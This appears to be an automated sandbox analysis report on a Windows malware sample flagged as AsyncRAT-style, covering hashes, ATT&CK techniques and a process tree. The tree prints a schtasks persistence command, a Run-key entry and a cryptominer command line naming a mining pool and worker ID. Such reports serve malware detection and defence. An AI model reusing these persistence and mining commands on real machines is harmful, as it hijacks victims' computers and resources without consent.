e54ccfd9a2ab15b4461eb38baec21eb828f7757ca3e67db3b7acb261be34adcd

Analysis

max time kernel
136s
max time network
152s
platform
windows7_x64
resource
win7-20220414-en
submitted
18-05-2022 22:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ff72b295ded9889cee24320db368bcf1.exe
Size

809KB
MD5

ff72b295ded9889cee24320db368bcf1
SHA1

5d7991f8495d56088710dd558faba639ffd05292
SHA256

e54ccfd9a2ab15b4461eb38baec21eb828f7757ca3e67db3b7acb261be34adcd
SHA512

37ab209741e90c78565d170ab48d7ee83c8633e93e646a4c8f639c305c8b6528841668b6aa7797870612d24e11e1ff1aaae0f5622e9a2195957f9142e93a7b1b

Score

10^/10

persistence suricata

Malware Config

Signatures

suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata

Executes dropped EXE 2 IoCs

pid	Process
1568	IFMb39aGmCsqJcthXwNQEToq7.exe
1716	WlaOrzbfdk.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WlaOrzbfdk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WlaOrzbfdk.exe

Deletes itself 1 IoCs

pid	Process
1960	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
2016	ff72b295ded9889cee24320db368bcf1.exe
1568	IFMb39aGmCsqJcthXwNQEToq7.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TxMT8hHkO8fBB5FlBurdwljpn = "C:\\ProgramData\\4vFAHkNczECIXuLdvBZKuXofw\\IFMb39aGmCsqJcthXwNQEToq7.exe"	ff72b295ded9889cee24320db368bcf1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1744	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1760	timeout.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1568	IFMb39aGmCsqJcthXwNQEToq7.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe
2016	ff72b295ded9889cee24320db368bcf1.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	ff72b295ded9889cee24320db368bcf1.exe
Token: SeDebugPrivilege	2016	ff72b295ded9889cee24320db368bcf1.exe
Token: SeDebugPrivilege	1568	IFMb39aGmCsqJcthXwNQEToq7.exe
Token: SeDebugPrivilege	1568	IFMb39aGmCsqJcthXwNQEToq7.exe
Token: SeLockMemoryPrivilege	1716	WlaOrzbfdk.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 1744	2016	ff72b295ded9889cee24320db368bcf1.exe	29
PID 2016 wrote to memory of 1744	2016	ff72b295ded9889cee24320db368bcf1.exe	29
PID 2016 wrote to memory of 1744	2016	ff72b295ded9889cee24320db368bcf1.exe	29
PID 2016 wrote to memory of 1568	2016	ff72b295ded9889cee24320db368bcf1.exe	31
PID 2016 wrote to memory of 1568	2016	ff72b295ded9889cee24320db368bcf1.exe	31
PID 2016 wrote to memory of 1568	2016	ff72b295ded9889cee24320db368bcf1.exe	31
PID 2016 wrote to memory of 1960	2016	ff72b295ded9889cee24320db368bcf1.exe	32
PID 2016 wrote to memory of 1960	2016	ff72b295ded9889cee24320db368bcf1.exe	32
PID 2016 wrote to memory of 1960	2016	ff72b295ded9889cee24320db368bcf1.exe	32
PID 1960 wrote to memory of 1760	1960	cmd.exe	34
PID 1960 wrote to memory of 1760	1960	cmd.exe	34
PID 1960 wrote to memory of 1760	1960	cmd.exe	34
PID 1568 wrote to memory of 1716	1568	IFMb39aGmCsqJcthXwNQEToq7.exe	35
PID 1568 wrote to memory of 1716	1568	IFMb39aGmCsqJcthXwNQEToq7.exe	35
PID 1568 wrote to memory of 1716	1568	IFMb39aGmCsqJcthXwNQEToq7.exe	35

C:\Users\Admin\AppData\Local\Temp\ff72b295ded9889cee24320db368bcf1.exe
"C:\Users\Admin\AppData\Local\Temp\ff72b295ded9889cee24320db368bcf1.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\system32\schtasks.exe
  "schtasks.exe" /create /tn TxMT8hHkO8fBB5FlBurdwljpn /tr "C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe" /st 00:18 /du 23:59 /sc daily /ri 1 /f
  2⤵
  - Creates scheduled task(s)
  PID:1744
- C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe
  "C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe
    "C:\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe" --url xmr.hashcity.org:4444 --user first1805.15B34D9CC5 --pass x --title Service --cpu-max-threads-hint=70 --donate-level 0
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp424F.tmp.bat""
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\system32\timeout.exe
    timeout 6
    3⤵
    - Delays execution with timeout.exe
    PID:1760

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe

Filesize
86.7MB

MD5
f9bf0008c0f74a2f548ee34bbc1032e0

SHA1
7dfd8cf3a272208e1bb172474da1d19315adf41a

SHA256
2407f033d802662d53b4c3df5883c984668b6056593858c7b25f965a8d9d73c0

SHA512
d0fc6e93c88dd1bba944ea2ce356750330ca6d855cc55a81bcdcd21a2a8885b20ca2bb33ecbbe858b587d50c2a54c07880974a5414965d79ce14d586b825ac5e

Download Submit
C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
275.6MB

MD5
a94f972b31c622cca6822de7d99563d2

SHA1
151b1b8a81bab9f500854713bf4a82f25c9b307b

SHA256
42c1df15c12b286e8d368096e1e2096d135d185b8a1c36990cb80287800a181f

SHA512
50c05d2c0426e8c6350feae0da3e1c04dd2dc6d0a9d59f72a11a5b8c89dc478faf7348590f2e02acafd8b6319984ccbc82888e1f38a66a850137b4bd8676b185

Download Submit
C:\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
275.6MB

MD5
a94f972b31c622cca6822de7d99563d2

SHA1
151b1b8a81bab9f500854713bf4a82f25c9b307b

SHA256
42c1df15c12b286e8d368096e1e2096d135d185b8a1c36990cb80287800a181f

SHA512
50c05d2c0426e8c6350feae0da3e1c04dd2dc6d0a9d59f72a11a5b8c89dc478faf7348590f2e02acafd8b6319984ccbc82888e1f38a66a850137b4bd8676b185

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp424F.tmp.bat

Filesize
184B

MD5
1514b03c197c7f8f50e2087568e9cc7f

SHA1
3cf63a3c7729dea0bf2e494b1d6d58ad117072a3

SHA256
710b925bad5af423f5397507b37795e4df16be3ebc8daef8addac4366056e3e2

SHA512
94462a24d642c13ed24dc2b9df3eaf21faf236182a1a104699e9a3ad8280f2a1eaf6672cd36ee691260d1cacc46000ebeda9f558ee96cdeec1b2d7eef13151bf

Download Submit
\ProgramData\15B34D9CC5\MOxnfkG4eOfW0IpCi6MLrNgpm6qVgIEfhV3XOHL2\WlaOrzbfdk.exe

Filesize
86.7MB

MD5
0eb1cc97f73745bd2b9dbedd6af945d7

SHA1
9fa6a05e9a02c6f86cf13338be1fe232ce108c2c

SHA256
6032271a4d35237c36b3e41eb5019cff34d2f57dd16f64c414af211c5df87b53

SHA512
3c7a622b4497c761079493e46f6646f0c02ec232d7ac92d4d330a9147e7c652ede639f1a483e5b6b492f7daacbe3ab91cb95c3a8bb37c66857e5fa1ea1a359cc

Download Submit
\ProgramData\4vFAHkNczECIXuLdvBZKuXofw\IFMb39aGmCsqJcthXwNQEToq7.exe

Filesize
275.6MB

MD5
a94f972b31c622cca6822de7d99563d2

SHA1
151b1b8a81bab9f500854713bf4a82f25c9b307b

SHA256
42c1df15c12b286e8d368096e1e2096d135d185b8a1c36990cb80287800a181f

SHA512
50c05d2c0426e8c6350feae0da3e1c04dd2dc6d0a9d59f72a11a5b8c89dc478faf7348590f2e02acafd8b6319984ccbc82888e1f38a66a850137b4bd8676b185

Download Submit
memory/1568-63-0x000000013F860000-0x000000013F92E000-memory.dmp

Filesize
824KB

Download
memory/1568-67-0x000000001CA90000-0x000000001CB5A000-memory.dmp

Filesize
808KB

Download
memory/1568-68-0x000000001BF16000-0x000000001BF35000-memory.dmp

Filesize
124KB

Download
memory/1716-72-0x00000000003B0000-0x00000000003D0000-memory.dmp

Filesize
128KB

Download
memory/2016-54-0x000000013F870000-0x000000013F93E000-memory.dmp

Filesize
824KB

Download
memory/2016-58-0x000000001AD96000-0x000000001ADB5000-memory.dmp

Filesize
124KB

Download
memory/2016-56-0x0000000000750000-0x0000000000756000-memory.dmp

Filesize
24KB

Download
memory/2016-55-0x0000000002470000-0x0000000002546000-memory.dmp

Filesize
856KB

Download